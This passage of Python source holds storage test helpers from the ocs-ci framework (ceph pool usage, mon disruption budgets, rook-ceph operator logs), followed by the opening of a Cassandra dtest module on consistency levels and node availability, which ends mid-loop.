        OCS: VolumeSnapshotClass Instance

    """
    external = config.DEPLOYMENT["external_mode"]
    if interface_type == constants.CEPHBLOCKPOOL:
        if external:
            resource_name = constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
        else:
            resource_name = constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
    elif interface_type == constants.CEPHFILESYSTEM:
        if external:
            resource_name = constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
        else:
            resource_name = constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
    base_snapshot_class = OCP(
        kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
    )
    return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
    """
    Look up the VolumeSnapshotContent bound to a VolumeSnapshot.

    Args:
        snap_obj (OCS): OCS instance of kind VolumeSnapshot

    Returns:
        OCS: OCS instance of kind VolumeSnapshotContent

    """
    snap_data = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)
    snapcontent_name = snap_data["status"]["boundVolumeSnapshotContentName"]
    content_data = {
        "api_version": snap_obj.api_version,
        "kind": constants.VOLUMESNAPSHOTCONTENT,
        "metadata": {"name": snapcontent_name, "namespace": snap_obj.namespace},
    }
    snapcontent_obj = OCS(**content_data)
    snapcontent_obj.reload()
    return snapcontent_obj
def wait_for_pv_delete(pv_objs):
    """
    Wait for PVs to be deleted. PVs whose ReclaimPolicy is 'Retain' are
    deleted explicitly after they reach Released state.

    Args:
        pv_objs (list): OCS instances of kind PersistentVolume

    """
    for pv_obj in pv_objs:
        reclaim_policy = pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
        if reclaim_policy == constants.RECLAIM_POLICY_RETAIN:
            wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
            pv_obj.delete()
        pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=20, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
    """
    Fetch the used size of a ceph pool, retrying until it is close to the
    expected value when one is given.

    Args:
        cbp_name (str): Name of the ceph block pool
        exp_val(float): Expected size in GB

    Returns:
        float: Used size in GB

    """
    ct_pod = pod.get_ceph_tools_pod()
    pool_stats = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
    size_bytes = pool_stats["pools"][0]["size_bytes"]
    # Convert size to GB, rounded to 4 decimal places
    used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
    # Tolerate up to 1.5 GB difference from the expected value
    if exp_val and abs(exp_val - used_in_gb) > 1.5:
        raise UnexpectedBehaviour(
            f"Actual {used_in_gb} and expected size {exp_val} not "
            f"matching. Retrying"
        )
    return used_in_gb
def get_full_test_logs_path(cname, fname=None):
    """
    Build the full log-directory path for a particular test.

    This uses the inspect module to discover the caller's file and function
    name, so it needs to be called directly from the main test function.
    The output has the form:
    ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>

    Args:
        cname (obj): the Class object which was run and called this function
        fname (str): the function name for different tests log path

    Return:
        str : full path of the test logs relative to the ocs-ci base logs path

    """
    # Frame index 1 is the direct caller; keep the stack inspection at this
    # function's top level so the frame depth matches
    caller_frame = inspect.stack()[1]
    # the module path relative to ocs-ci base path
    log_file_name = caller_frame[1].replace(f"{os.getcwd()}/", "")
    class_name = type(cname).__name__
    if fname is None:
        fname = caller_frame[3]
    # the full log path (relative to ocs-ci base path)
    return f"{ocsci_log_path()}/{log_file_name}/{class_name}/{fname}"
def get_mon_pdb():
    """
    Fetch the mon PodDisruptionBudget status.

    Returns:
        disruptions_allowed (int): Count of mon allowed disruption
        min_available_mon (int): Count of minimum mon available
        max_unavailable_mon (int): Count of maximun mon unavailable

    """
    pdb_obj = OCP(
        kind=constants.POD_DISRUPTION_BUDGET,
        resource_name=constants.MON_PDB,
        namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    )
    # Fetch the resource once instead of three times, so all three values
    # come from the same consistent snapshot (and 2 API calls are saved)
    pdb_data = pdb_obj.get()
    disruptions_allowed = pdb_data.get("status").get("disruptionsAllowed")
    min_available_mon = pdb_data.get("spec").get("minAvailable")
    max_unavailable_mon = pdb_data.get("spec").get("maxUnavailable")
    return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
    """
    Compare the actual mon PDB status with the expected one.

    Args:
        disruptions_allowed (int): the expected number of disruptions_allowed
        max_unavailable_mon (int): the expected number of max_unavailable_mon

    return:
        bool: True if the expected pdb state equal to actual pdb state, False otherwise

    """
    logging.info("Check mon pdb status")
    actual_disruptions, _, actual_max_unavailable = get_mon_pdb()
    result = True
    if disruptions_allowed != actual_disruptions:
        result = False
        logger.error(
            f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {actual_disruptions}"
        )
    if max_unavailable_mon != actual_max_unavailable:
        result = False
        logger.error(
            f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {actual_max_unavailable}"
        )
    return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
    cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
    """
    Run a command and verify that its output contains all expected strings.

    Args:
        cmd(str): cli command
        expected_output_lst(set): A set of strings that need to be included in the command output.
        cephtool_cmd(bool): command on ceph-tool pod
        debug_node(str): name of node

    Returns:
        bool: True of all strings are included in the command output, False otherwise

    """
    if cephtool_cmd is True:
        # Run the command inside the ceph tools pod
        tool_pod = pod.get_ceph_tools_pod()
        cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
        cmd = f"{cmd_start} {cmd}"
    elif debug_node is not None:
        # Run the command on the node through a debug pod
        cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
        cmd = f'{cmd_start} "{cmd}"'
    out = run_cmd(cmd=cmd)
    logger.info(out)
    return all(expected_output in out for expected_output in expected_output_lst)
def check_rbd_image_used_size(
    pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
    """
    Verify the RBD image used size of each PVC against a given value.

    Args:
        pvc_objs (list): List of PVC objects
        usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
        rbd_pool (str): Name of the pool
        expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
            False to verify the used size is not equal to 'usage_to_compare' value.

    Returns:
        bool: True if the verification is success for all the PVCs, False otherwise

    """
    ct_pod = pod.get_ceph_tools_pod()
    failed_pvc_names = []
    for pvc_obj in pvc_objs:
        rbd_image_name = pvc_obj.get_rbd_image_name
        du_out = ct_pod.exec_ceph_cmd(
            ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
            format="",
        )
        # The last two whitespace-separated tokens form the used size,
        # e.g. "5 GiB" -> "5GiB"
        used_size = "".join(du_out.strip().split()[-2:])
        sizes_match = used_size == usage_to_compare
        if expect_match and not sizes_match:
            logger.error(
                f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
                f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
                f"Rbd du out: {du_out}"
            )
            failed_pvc_names.append(pvc_obj.name)
        elif not expect_match and sizes_match:
            logger.error(
                f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
                f"Expected the used size to be diferent than {usage_to_compare}. "
                f"Actual used size: {used_size}. Rbd du out: {du_out}"
            )
            failed_pvc_names.append(pvc_obj.name)
    if failed_pvc_names:
        logger.error(
            f"RBD image used size of these PVCs did not meet the expectation - {failed_pvc_names}"
        )
        return False
    return True
def set_configmap_log_level_rook_ceph_operator(value):
    """
    Patch the rook-ceph-operator configmap to set ROOK_LOG_LEVEL.

    Args:
        value (str): type of log

    """
    patch_path = "/data/ROOK_LOG_LEVEL"
    params = f"""[{{"op": "add", "path": "{patch_path}", "value": "{value}"}}]"""
    configmap_obj = OCP(
        kind=constants.CONFIGMAP,
        namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
        resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
    )
    logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
    configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
    """
    Fetch the logs of the rook-ceph-operator pod.

    Returns:
        str: Output from 'oc get logs rook-ceph-operator command

    """
    logger.info("Get logs from rook_ceph_operator pod")
    operator_pods = pod.get_operator_pods()
    return pod.get_pod_logs(pod_name=operator_pods[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
    last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
    """
    Respin a random OSD pod, then verify that the new rook-ceph-operator
    log lines contain the expected strings and none of the unexpected ones.

    Args:
        last_log_date_time_obj (datetime obj): only log lines newer than
            this timestamp are examined
        expected_strings (list): verify the logs contain the expected strings
        unexpected_strings (list): verify the logs do not contain the strings

    Returns:
        bool: True if logs contain the expected strings and the logs do not
            contain the unexpected strings, False otherwise

    """
    logger.info("Respin OSD pod")
    victim_osd = random.choice(pod.get_osd_pods())
    victim_osd.delete()
    # Keep only lines written after the given timestamp
    new_logs = []
    for line in get_logs_rook_ceph_operator().splitlines():
        line_time = get_event_line_datetime(line)
        if line_time and line_time > last_log_date_time_obj:
            new_logs.append(line)
    res_expected = False
    res_unexpected = True
    for new_log in new_logs:
        if all(
            expected_string.lower() in new_log.lower()
            for expected_string in expected_strings
        ):
            res_expected = True
            logger.info(f"{new_log} contain expected strings {expected_strings}")
            break
    for new_log in new_logs:
        if any(
            unexpected_string.lower() in new_log.lower()
            for unexpected_string in unexpected_strings
        ):
            logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
            res_unexpected = False
            break
    return res_expected and res_unexpected
def get_last_log_time_date():
    """
    Get the timestamp of the last dated line in the rook-ceph-operator logs.

    Returns:
        datetime.datetime: The timestamp of the last log line that carries a
            date, or None if no dated line was found

    """
    logger.info("Get last log time")
    # Initialize so we don't hit UnboundLocalError when no line has a timestamp
    last_log_date_time_obj = None
    rook_ceph_operator_logs = get_logs_rook_ceph_operator()
    for line in rook_ceph_operator_logs.splitlines():
        log_date_time_obj = get_event_line_datetime(line)
        if log_date_time_obj:
            last_log_date_time_obj = log_date_time_obj
    return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
    """
    Clean up after disruptive tests (e.g. device replacement or node
    replacement): delete leftover ocs-osd-removal jobs and, when all OSDs
    are back up, archive any ceph daemon crash warnings.
    """
    if pod.delete_all_osd_removal_jobs():
        logger.info("Successfully deleted all the ocs-osd-removal jobs")

    osd_pod_names = [osd_pod.name for osd_pod in pod.get_osd_pods()]
    if not pod.wait_for_pods_to_be_running(pod_names=osd_pod_names, timeout=120):
        # Archiving crash warnings is only safe once every OSD is running
        logger.warning("There are still osds down. Can't clear ceph crash warnings")
        return

    crash_warnings_present = run_cmd_verify_cli_output(
        cmd="ceph health detail",
        expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
        cephtool_cmd=True,
    )
    if not crash_warnings_present:
        logger.info("There are no daemon crash warnings")
        return

    logger.info("Clear all ceph crash warnings")
    pod.get_ceph_tools_pod().exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
def get_noobaa_url():
    """
    Look up the host of the noobaa management console route.

    Returns:
        str: url of noobaa console

    """
    route_data = OCP(
        kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    ).get(resource_name="noobaa-mgmt")
    return route_data["spec"]["host"]
def select_unique_pvcs(pvcs):
    """
    Get the PVCs with unique access mode and volume mode combination.
    For each combination, the first PVC encountered in 'pvcs' is kept.

    Args:
        pvcs(list): List of PVC objects

    Returns:
        list: List of selected PVC objects

    """
    pvc_dict = {}
    for pvc_obj in pvcs:
        pvc_data = pvc_obj.get()
        access_mode_volume_mode = (
            pvc_data["spec"]["accessModes"][0],
            pvc_data["spec"].get("volumeMode"),
        )
        # setdefault keeps the first PVC seen for each combination
        pvc_dict.setdefault(access_mode_volume_mode, pvc_obj)
    # Return an actual list, as documented (previously a dict_values view)
    return list(pvc_dict.values())
def mon_pods_running_on_same_node():
    """
    Verify that no two mon pods share the same node.

    Raises:
        UnexpectedBehaviour: If two or more mons run on the same node

    """
    mon_running_nodes = node.get_mon_running_nodes()
    has_duplicates = len(set(mon_running_nodes)) != len(mon_running_nodes)
    if has_duplicates:
        logger.error(f"Mons running on nodes: {mon_running_nodes}")
        raise UnexpectedBehaviour("Two or more mons running on same node")
    logger.info("Mons are running on different nodes")
def get_failure_domain():
    """
    Get Failure Domain

    Returns:
        string: type of failure domain

    """
    # Imported locally to avoid a circular import at module load time
    from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster

    storage_cluster = get_storage_cluster()
    first_item = storage_cluster.data["items"][0]
    return first_item["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
    """
    Scale a statefulset up or down by patching its replica count.

    Args:
        statefulset_name (str): Name of statefulset
        replica_count (int): replica count to be changed to

    Returns:
        bool: True in case if changes are applied. False otherwise

    """
    params = f'{{"spec": {{"replicas": {replica_count}}}}}'
    statefulset_ocp_obj = OCP(
        kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    return statefulset_ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
    """
    Extract the timestamp at the start of a log/event line.

    Args:
        event_line (str): The event line to get it's datetime

    Returns:
        datetime object: The parsed timestamp, or None when the line carries
            no date

    """
    date_regex = r"\d{4}-\d{2}-\d{2}"
    timestamp_format = "%Y-%m-%d %H:%M:%S.%f"
    if re.search(date_regex + "T", event_line):
        # ISO-like "YYYY-MM-DDTHH:MM:SS.mmm" prefix (millisecond precision)
        dt_string = event_line[:23].replace("T", " ")
        return datetime.datetime.strptime(dt_string, timestamp_format)
    if re.search(date_regex, event_line):
        # "YYYY-MM-DD HH:MM:SS.ffffff" prefix (microsecond precision)
        return datetime.datetime.strptime(event_line[:26], timestamp_format)
    return None
def get_rook_ceph_pod_events(pod_name):
    """
    Get the rook ceph pod events from the rook ceph pod operator logs

    Args:
        pod_name (str): The rook ceph pod name to get the events

    Returns:
        list: List of all the event lines with the specific pod

    """
    matching_lines = []
    for log_line in get_logs_rook_ceph_operator().splitlines():
        if pod_name in log_line:
            matching_lines.append(log_line)
    return matching_lines
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
    """
    Filter a pod's operator-log event lines to those containing 'keyword'
    (case-insensitive match).

    Args:
        pod_name (str): The rook ceph pod name to get the events
        keyword (str): The keyword to search in the events

    Returns:
        list: List of all the event lines with the specific pod that has the keyword 'keyword'

    """
    lowered_keyword = keyword.lower()
    pod_event_lines = get_rook_ceph_pod_events(pod_name)
    return [line for line in pod_event_lines if lowered_keyword in line.lower()]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
    """
    Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
    desired status, check if the reason is that the pod is not found. If this is the case,
    check in the rook ceph pod operator logs to see if the pod reached the desired status.

    Args:
        pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
        desired_status (str): The desired status of the pod to wait for
        timeout (int): time to wait for the pod to reach the desired status

    Returns:
        bool: True if the rook ceph pod reached the desired status. False, otherwise

    """
    start_log_datetime = get_last_log_time_date()
    try:
        wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
    except (ResourceWrongStatusException, CommandFailed) as e:
        if "not found" not in str(e):
            logger.info(f"An error has occurred when trying to get the pod object: {e}")
            return False
        logger.info(
            f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
            f"in rook ceph operator logs..."
        )
        pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
            pod_obj.name, keyword=desired_status
        )
        # Guard against IndexError when no matching event line was found
        if not pod_event_lines_with_desired_status:
            logger.info(
                f"Did not find any event of pod {pod_obj.name} with status "
                f"{desired_status} in rook ceph operator logs"
            )
            return False
        last_pod_event_line = pod_event_lines_with_desired_status[-1]
        last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
        if last_pod_event_datetime > start_log_datetime:
            logger.info(
                f"Found the event of pod {pod_obj.name} with status {desired_status} in "
                f"rook ceph operator logs. The event line is: {last_pod_event_line}"
            )
            return True
        return False
    return True
def check_number_of_mon_pods(expected_mon_num=3):
    """
    Check whether the number of mon pods matches the expected count.

    Args:
        expected_mon_num (int): The expected number of mon pods

    Returns:
        bool: True if number of mon pods is 3, False otherwise

    """
    mon_pod_list = pod.get_mon_pods()
    if len(mon_pod_list) != expected_mon_num:
        logger.error(f"Number of Mons not equal to {expected_mon_num} {mon_pod_list}")
        return False
    logger.info(f"Number of mons equal to {expected_mon_num}")
    return True
def get_secret_names(namespace=defaults.ROOK_CLUSTER_NAMESPACE, resource_name=""):
    """
    Get secrets names

    Args:
        namespace (str): The name of the project.
        resource_name (str): The resource name to fetch.

    Returns:
        list: The names of the secrets found

    """
    logger.info(f"Get secret names on project {namespace}")
    secrets_data = ocp.OCP(kind=constants.SECRET, namespace=namespace).get(
        resource_name=resource_name
    )
    return [item["metadata"]["name"] for item in secrets_data["items"]]
def check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running():
    """
    check rook-ceph-crashcollector pods running on worker nodes
    where rook-ceph pods are running.

    Returns:
        bool: True if the rook-ceph-crashcollector pods running on worker nodes
            where rook-ceph pods are running. False otherwise.

    """
    logger.info(
        "check rook-ceph-crashcollector pods running on worker nodes "
        "where rook-ceph pods are running."
    )
    # Fetch each node list once, so the logged values are exactly the values
    # compared (the original queried the cluster twice per list, which could
    # race with pod movement and log values different from those compared)
    crashcollector_nodes = node.get_crashcollector_nodes()
    ocs_pod_nodes = node.get_nodes_where_ocs_pods_running()
    logger.info(
        f"crashcollector nodes: {crashcollector_nodes}, "
        f"nodes where ocs pods running: {ocs_pod_nodes}"
    )
    res = sorted(crashcollector_nodes) == sorted(ocs_pod_nodes)
    if not res:
        logger.warning(
            "rook-ceph-crashcollector pods are not running on worker nodes "
            "where rook-ceph pods are running."
        )
    return res
def verify_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running(timeout=90):
    """
    Repeatedly verify (every 10 seconds, up to 'timeout') that
    rook-ceph-crashcollector pods run on the worker nodes where rook-ceph
    pods are running.

    Args:
        timeout (int): time to wait for verifying

    Returns:
        bool: True if rook-ceph-crashcollector pods running on worker nodes
            where rook-ceph pods are running in the given timeout. False otherwise.

    """
    sampler = TimeoutSampler(
        timeout=timeout,
        sleep=10,
        func=check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running,
    )
    return sampler.wait_for_func_status(result=True)
|
consistency_test.py | import queue
import sys
import threading
import time
import pytest
import logging
from collections import OrderedDict, namedtuple
from copy import deepcopy
from cassandra import ConsistencyLevel, consistency_value_to_name
from cassandra.query import BatchStatement, BatchType, SimpleStatement
from tools.assertions import (assert_all, assert_length_equal, assert_none,
assert_unavailable)
from dtest import MultiError, Tester, create_ks, create_cf
from tools.data import (create_c1c2_table, insert_c1c2, insert_columns,
query_c1c2, rows_to_list)
from tools.jmxutils import JolokiaAgent, make_mbean, remove_perf_disable_shared_mem
# Alias for the version-gating pytest marker used by the dtest framework
since = pytest.mark.since
logger = logging.getLogger(__name__)
# Expected consistency for an operation: how many nodes must acknowledge the
# write, how many are queried on read, and whether R + W > N (strong)
ExpectedConsistency = namedtuple('ExpectedConsistency', ('num_write_nodes', 'num_read_nodes', 'is_strong'))
class TestHelper(Tester):
    """
    Base class with the helpers shared by the consistency tests:
    consistency-level arithmetic, cluster setup, and simple read/write
    operations on the 'users' and 'counters' tables.
    """

    def _is_local(self, cl):
        # True for consistency levels scoped to the local data center
        return (cl == ConsistencyLevel.LOCAL_QUORUM or
                cl == ConsistencyLevel.LOCAL_ONE or
                cl == ConsistencyLevel.LOCAL_SERIAL)

    def _is_conditional(self, cl):
        # True for serial (lightweight transaction) consistency levels
        return (cl == ConsistencyLevel.SERIAL or
                cl == ConsistencyLevel.LOCAL_SERIAL)

    def _required_nodes(self, cl, rf_factors, dc):
        """
        Return the number of nodes required by this consistency level
        in the current data center, specified by the dc parameter,
        given a list of replication factors, one per dc.
        """
        return {
            ConsistencyLevel.ANY: 1,
            ConsistencyLevel.ONE: 1,
            ConsistencyLevel.TWO: 2,
            ConsistencyLevel.THREE: 3,
            ConsistencyLevel.QUORUM: sum(rf_factors) // 2 + 1,
            ConsistencyLevel.ALL: sum(rf_factors),
            ConsistencyLevel.LOCAL_QUORUM: rf_factors[dc] // 2 + 1,
            ConsistencyLevel.EACH_QUORUM: rf_factors[dc] // 2 + 1,
            ConsistencyLevel.SERIAL: sum(rf_factors) // 2 + 1,
            ConsistencyLevel.LOCAL_SERIAL: rf_factors[dc] // 2 + 1,
            ConsistencyLevel.LOCAL_ONE: 1,
        }[cl]

    def get_expected_consistency(self, idx, rf_factors, write_cl, read_cl):
        """
        Given a node index, identify to which data center we are connecting and return
        the expected consistency: number of nodes we write to, read from, and whether
        we should have strong consistency, that is whether R + W > N
        """
        # self.nodes is an int for a single dc, or a list of per-dc counts
        nodes = [self.nodes] if isinstance(self.nodes, int) else self.nodes

        def get_data_center():
            """
            :return: the data center corresponding to this node
            """
            dc = 0
            for i in range(1, len(nodes)):
                if idx < sum(nodes[:i]):
                    break
                dc += 1
            return dc

        data_center = get_data_center()

        if write_cl == ConsistencyLevel.EACH_QUORUM:
            # EACH_QUORUM writes to a quorum in every data center
            write_nodes = sum([self._required_nodes(write_cl, rf_factors, i) for i in range(0, len(nodes))])
        else:
            write_nodes = self._required_nodes(write_cl, rf_factors, data_center)

        read_nodes = self._required_nodes(read_cl, rf_factors, data_center)
        is_strong = read_nodes + write_nodes > sum(rf_factors)

        return ExpectedConsistency(num_write_nodes=write_nodes,
                                   num_read_nodes=read_nodes,
                                   is_strong=is_strong)

    def _should_succeed(self, cl, rf_factors, num_nodes_alive, current):
        """
        Return true if the read or write operation should succeed based on
        the consistency level requested, the replication factors and the
        number of nodes alive in each data center.
        """
        if self._is_local(cl):
            return num_nodes_alive[current] >= self._required_nodes(cl, rf_factors, current)
        elif cl == ConsistencyLevel.EACH_QUORUM:
            # Every data center must be able to reach its own quorum
            for i in range(0, len(rf_factors)):
                if num_nodes_alive[i] < self._required_nodes(cl, rf_factors, i):
                    return False
            return True
        else:
            return sum(num_nodes_alive) >= self._required_nodes(cl, rf_factors, current)

    def _start_cluster(self, save_sessions=False, requires_local_reads=False):
        """
        Populate and start the cluster described by self.nodes / self.rf,
        create the test keyspace and tables, and optionally store one
        exclusive session per node in self.sessions.
        """
        cluster = self.cluster
        nodes = self.nodes
        rf = self.rf

        configuration_options = {'hinted_handoff_enabled': False}
        # If we must read from the local replica first, then the dynamic snitch poses a problem
        # because occasionally it may think that another replica is preferable even if the
        # coordinator is a replica
        if requires_local_reads:
            configuration_options['dynamic_snitch'] = False
        cluster.set_configuration_options(values=configuration_options)
        cluster.populate(nodes)
        if requires_local_reads and isinstance(nodes, int):
            # Changing the snitch to PropertyFileSnitch even in the
            # single dc tests ensures that StorageProxy sorts the replicas eligible
            # for reading by proximity to the local host, essentially picking the
            # local host for local reads, see IEndpointSnitch.sortByProximity() and
            # StorageProxy.getLiveSortedEndpoints(), which is called by the AbstractReadExecutor
            # to determine the target replicas. The default case, a SimpleSnitch wrapped in
            # a dynamic snitch, may rarely choose a different replica.
            logger.debug('Changing snitch for single dc case')
            for node in cluster.nodelist():
                node.data_center = 'dc1'
            cluster.set_configuration_options(values={
                'endpoint_snitch': 'org.apache.cassandra.locator.PropertyFileSnitch'})
        cluster.start(wait_for_binary_proto=True, wait_other_notice=True)

        self.ksname = 'mytestks'
        session = self.patient_exclusive_cql_connection(cluster.nodelist()[0])
        create_ks(session, self.ksname, rf)
        self.create_tables(session, requires_local_reads)

        if save_sessions:
            self.sessions = []
            self.sessions.append(session)
            for node in cluster.nodelist()[1:]:
                self.sessions.append(self.patient_exclusive_cql_connection(node, self.ksname))

    def create_tables(self, session, requires_local_reads):
        # Create both test tables and wait for schema agreement across nodes
        self.create_users_table(session, requires_local_reads)
        self.create_counters_table(session, requires_local_reads)
        session.cluster.control_connection.wait_for_schema_agreement(wait_time=60)

    def truncate_tables(self, session):
        # Truncate at CL ALL so every replica is emptied
        statement = SimpleStatement("TRUNCATE users", ConsistencyLevel.ALL)
        session.execute(statement)
        statement = SimpleStatement("TRUNCATE counters", ConsistencyLevel.ALL)
        session.execute(statement)

    def create_users_table(self, session, requires_local_reads):
        create_cmd = """
            CREATE TABLE users (
                userid int PRIMARY KEY,
                firstname text,
                lastname text,
                age int
            )"""
        if requires_local_reads:
            create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
        session.execute(create_cmd)

    @staticmethod
    def get_local_reads_properties(cluster_version):
        """
        If we must read from the local replica first, then we should disable read repair and
        speculative retry, see CASSANDRA-12092
        """
        if cluster_version < '4.0':
            return " dclocal_read_repair_chance = 0 AND read_repair_chance = 0 AND speculative_retry = 'NONE'"
        else:
            # The read_repair_chance table options were removed in 4.0
            return " speculative_retry = 'NONE'"

    def insert_user(self, session, userid, age, consistency, serial_consistency=None):
        # When a serial CL is supplied the insert becomes conditional (LWT)
        text = "INSERT INTO users (userid, firstname, lastname, age) VALUES ({}, 'first{}', 'last{}', {}) {}"\
            .format(userid, userid, userid, age, "IF NOT EXISTS" if serial_consistency else "")
        statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
        session.execute(statement)

    def update_user(self, session, userid, age, consistency, serial_consistency=None, prev_age=None):
        text = "UPDATE users SET age = {} WHERE userid = {}".format(age, userid)
        if serial_consistency and prev_age:
            # Conditional update (LWT) against the previous age value
            text = text + " IF age = {}".format(prev_age)
        statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
        session.execute(statement)

    def delete_user(self, session, userid, consistency):
        statement = SimpleStatement("DELETE FROM users where userid = {}".format(userid), consistency_level=consistency)
        session.execute(statement)

    def query_user(self, session, userid, age, consistency, check_ret=True):
        """
        Read back a user row and compare it to the expected [userid, age] row
        (an empty result when age is falsy). Assert on mismatch when
        check_ret is True; always return the comparison result.
        """
        statement = SimpleStatement("SELECT userid, age FROM users where userid = {}".format(userid), consistency_level=consistency)
        res = session.execute(statement)
        expected = [[userid, age]] if age else []
        ret = rows_to_list(res) == expected
        if check_ret:
            assert ret, "Got {} from {}, expected {} at {}".format(rows_to_list(res), session.cluster.contact_points, expected, consistency_value_to_name(consistency))
        return ret

    def create_counters_table(self, session, requires_local_reads):
        create_cmd = """
            CREATE TABLE counters (
                id int PRIMARY KEY,
                c counter
            )"""
        if requires_local_reads:
            create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
        session.execute(create_cmd)

    def update_counter(self, session, id, consistency, serial_consistency=None):
        # Increment the counter by one; return the statement for reuse
        text = "UPDATE counters SET c = c + 1 WHERE id = {}".format(id)
        statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
        session.execute(statement)
        return statement

    def query_counter(self, session, id, val, consistency, check_ret=True):
        """
        Read a counter and compare it to the expected value. Assert on
        mismatch when check_ret is True; return the value read (0 if absent).
        """
        statement = SimpleStatement("SELECT * from counters WHERE id = {}".format(id), consistency_level=consistency)
        ret = rows_to_list(session.execute(statement))
        if check_ret:
            assert ret[0][1] == val, "Got {} from {}, expected {} at {}".format(ret[0][1],
                                                                                session.cluster.contact_points,
                                                                                val,
                                                                                consistency_value_to_name(consistency))
        return ret[0][1] if ret else 0
class TestAvailability(TestHelper):
    """
    Test that we can read and write depending on the number of nodes that are alive and the consistency levels.
    """

    def _test_simple_strategy(self, combinations):
        """
        Helper test function for a single data center: invoke _test_insert_query_from_node() for each node
        and each combination, progressively stopping nodes.
        """
        cluster = self.cluster
        nodes = self.nodes
        rf = self.rf

        num_alive = nodes
        for node in range(nodes):
            logger.debug('Testing node {} in single dc with {} nodes alive'.format(node, num_alive))
            session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
            for combination in combinations:
                self._test_insert_query_from_node(session, 0, [rf], [num_alive], *combination)

            # Stop the node we just tested from, so the next iteration runs
            # with one fewer node alive
            self.cluster.nodelist()[node].stop()
            num_alive -= 1

    def _test_network_topology_strategy(self, combinations):
        """
        Helper test function for multiple data centers, invoke _test_insert_query_from_node() for each node
        in each dc and each combination, progressively stopping nodes.
        """
        cluster = self.cluster
        nodes = self.nodes
        rf = self.rf

        nodes_alive = deepcopy(nodes)
        rf_factors = list(rf.values())

        for i in range(0, len(nodes)):  # for each dc
            logger.debug('Testing dc {} with rf {} and {} nodes alive'.format(i, rf_factors[i], nodes_alive))
            for n in range(nodes[i]):  # for each node in this dc
                logger.debug('Testing node {} in dc {} with {} nodes alive'.format(n, i, nodes_alive))
                # Global node index across data centers
                node = n + sum(nodes[:i])
                session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
                for combination in combinations:
                    self._test_insert_query_from_node(session, i, rf_factors, nodes_alive, *combination)

                self.cluster.nodelist()[node].stop(wait_other_notice=True)
                nodes_alive[i] -= 1

    def _test_insert_query_from_node(self, session, dc_idx, rf_factors, num_nodes_alive, write_cl, read_cl, serial_cl=None, check_ret=True):
        """
        Test availability for read and write via the session passed in as a parameter.
        """
        logger.debug("Connected to %s for %s/%s/%s" %
                     (session.cluster.contact_points, consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl)))

        start = 0
        end = 100
        age = 30

        # Writes must succeed when enough nodes are alive; otherwise the
        # coordinator must raise Unavailable
        if self._should_succeed(write_cl, rf_factors, num_nodes_alive, dc_idx):
            for n in range(start, end):
